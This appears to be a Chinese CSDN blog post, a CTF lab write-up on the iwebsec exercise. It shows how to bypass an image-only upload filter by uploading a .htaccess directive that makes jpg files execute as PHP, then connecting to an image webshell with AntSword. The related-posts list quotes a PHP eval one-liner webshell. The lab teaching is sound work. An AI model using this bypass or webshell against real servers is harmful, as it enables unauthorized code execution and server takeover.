CTF学习笔记20:iwebsec-文件上传漏洞-05-htaccess文件上传

已于 2022-03-18 18:18:32 修改
阅读量4.8k 收藏 2
点赞数 4
分类专栏: CTF 文章标签: 学习 php 安全
于 2022-03-11 09:10:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/123416200
版权

本练习最终只能上传图片,关键要让图片文件可以调用,也就是作为php解析。

一、通过之前的方法均不能上传php文件

通过burpsuite配合改扩展名、大小写、双写等手段均不上传成功。
在这里插入图片描述

二、编写并上传.htaccess文件上传,将图片作为php解析

编写.htaccess文件并上传,作用是将之后上传的同文件夹下的jpg文件作为php文件解析执行

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

在这里插入图片描述

三、再直接上传之前同样图片文件,不改扩展名

图片文件内容为:
在这里插入图片描述

在这里插入图片描述

四、测试连接

用中国蚁剑软件测试连接,url地址中的地址直接指向jpg文件,即up/5.jpg,密码为cmd,经测试连接成功。
在这里插入图片描述

lf_x
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全之文件漏洞
qq_56158055的博客
01-15 1903
文件漏洞原理 由于开发人员对用户上文件的部分处理的不够严谨,从而导致用户可以上恶意文件,并执行这种恶意文件,从而获取执行服务器的权限。 漏洞的危害 获取服务器webshell权限 任意查看、修改、删除、下载对方文件 查看数据库信息 执行命令 挂黑页、木马等 漏洞发现 上头像的位置 敏感身份认证的位置(身份证等各种证件的照片上处) 订单反馈的位置(上照片) 各种能上场文件的地方 注意事项 可解析php的后缀:php,php2,php3,php4,php..
WEB入门——文件漏洞
HasntStartIsOver的博客
06-04 4949
文件漏洞服务端代码未对客户端上文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上图片,JS脚本显示了只能上图片格式,不能上.php后缀的文件)。1、上文件是web脚本语言,服务器的web容器解释并执行了用户上的脚本,脚本语言执行。
文件笔记(.htaccess)
weixin_43827234的博客
08-11 65
最后连接119.jpg这个文件就可以连接了。然后在上点先上.htaccess文件。然后再上名为119.jpg的图片马。首先确定网站是PHP编写的。
【网络安全之文件漏洞详解】(1)
最新发布
2301_82242964的博客
04-28 1035
修改路径值,添加%00,然后提交。与白名单相反,通过限制某些文件格式,使其无法上之服务端。只存在于APACHE中主要功能:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
文件漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件文件就是通过流的方式将文件写到服务器上 文件必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们递过去的任意PHP语句。这便是一句话木马
文件之.htaccess文件利用
注定风是不羁旅人
11-21 1822
关于.htaccess文件又不懂的同学可以去点击以下链接去了解 点击这里 当我们遇到目标限制了很多文件后缀名的情况时,我们可以考虑使用.htaccess进行绕过 首先我们先上一个.htaccess文件文件内容如下 SetHandler application/x-httpd-php 这段内容的作用是使所有的文件都会被解析为php文件成功之后我们准备上木马 木马后缀名只要不是目标...
web-渗透-文件漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件漏洞的环境,从前端绕过、服务器绕过、木马图上绕过、截断绕过、竞争条件等等几乎包含目前所有的文件漏洞类型,刷完即掌握文件漏洞的所有要点。 文件中打包了所需的所有环境...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
需要测试vCenter 6.5 Linux(VCSA)/窗口等待测试vCenter 6.7 Linux(VCSA)/窗口等待测试vCenter 7.0 Linux(VCSA)/窗口等待测试细节突破为任意文件存在问题的接口为/ui/vropspluginui/rest/services/...
文件泄漏利用工具: ds-store-exp
12-17
文件泄漏利用工具: ds_store_exp
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTFHub技能书解题笔记-文件-.htaccess
qq_43006864的博客
01-05 1078
打开题目 这里好好看看题干,信息量蛮多的, 索性查查.htaccess。内容蛮多的,这里我就概括一下这道题用到的重点。 htaccess文件是Apache服务器中的一个配置文件,可以帮我们实现:改变文件扩展名。 然后,先构造一个.htaccess文件文件内容是将文件扩展名改为PHP。方便我们执行马子。 附上文件内容:SetHandler application/x-httpd-php 打开链接 上.htaccess文件。 然后上.JPG格式的php马子。 其.
文件--Upload-labs--Pass04--.htaccess绕过
2302_79800344的博客
02-18 658
.htaccess绕过
文件漏洞
qq_22553739的博客
12-21 2415
文件漏洞 概念 文件漏洞发生在有上功能的应用中,如果应用程序没有对用户上文件没有经过严格的合法性检验或者检验或者检验函数存在缺陷,攻击者可以上木马、病毒等有危害的文件到服务器上面,控制服务器。 ...
Web安全--文件漏洞
bobo_milk的博客
11-11 1089
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
CTFHub-文件-.htaccess文件
qq_60905276的博客
11-19 1218
了解一下题目所说的htaccess文件。 他是Apache服务器中的一个配置文件,它负责相关目录下的网页配置,属于后端中间件的验证。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。看来权限还很大啊。 其中.htaccess文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上任何文件,只要符合php语言代码
文件
土拨鼠挖洞中的博客
10-04 636
文件绕过     常见限制绕过    白名单:     00截断绕过 %00截断:url中%00后面的内容会被注释,一般用于URL中修改文件名 0x00截断:0x00代表空字符,截断注释后面内容 MIME限制改类型: 绕过Content-Type检测文件类型上 当浏览器在上文件到服务器端的时候,服务器对上文件Content-Type类型进行检测,如果是白名单允许的,...
CTF整理】CTFhub技能树-Web-文件-.htaccess
SunnyCat
05-15 3115
CTF整理】CTFhub技能树-Web-文件-.htaccess CTFhub技能树里面的题最近做了一些,但是除了之前的SQL注入之外,其他的我实在没什么兴趣整理,毕竟网上的整理出来的博主很多,之所以专门整理这个文件.htaccess的题目,是因为我踩坑了,本以为一道简单的题目我就这么硬生生的踩进去了,还差点没出来,浪费了不少金币啊。看别的博主都是上.htaccess文件,上修改后缀的一句话木马,菜刀或是蚁剑一连就getshell了,简单的不能再简单,为毛我试了N次都是不行?试了各种形式的.h
验证绕过全解析
weixin_33941350的博客
04-19 667
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
ctfhub 文件 - 00截断
06-28
ctfhub 文件 - 00截断是一种常见的安全漏洞,攻击者可以通过截断文件名或者文件内容来绕过文件的限制,从而上恶意文件或者执行任意代码。这种漏洞需要开发人员在编写文件功能时注意对文件名和内容进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值